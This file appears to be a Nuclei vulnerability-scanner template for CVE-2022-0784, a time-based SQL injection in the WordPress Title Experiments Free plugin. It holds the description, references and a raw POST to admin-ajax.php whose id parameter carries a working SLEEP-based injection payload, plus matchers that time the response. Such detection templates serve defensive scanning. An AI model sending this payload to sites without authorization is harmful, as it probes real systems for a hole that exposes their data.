nuclei-templates/http/cves/2022/CVE-2022-0784.yaml

53 lines
2.4 KiB
YAML

id: CVE-2022-0784
info:
name: WordPress Title Experiments Free <9.0.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
remediation: |
Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
- https://github.com/cyllective/CVEs
- https://github.com/superlink996/chunqiuyunjingbachang
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0784
cwe-id: CWE-89
epss-score: 0.04043
epss-percentile: 0.91894
cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: title_experiments_free_project
product: title_experiments_free
framework: wordpress
tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
http:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and
# digest: 490a00463044021f1195a13a42ffdab24fe1a153051ee57e125fe5d1aa81e77333ae6af0d54794022100de53b58284ec8656a4b09537d5f58ff210002891439cc282e725071c8681e4bc:922c64590222798bb761d5b6d8e72950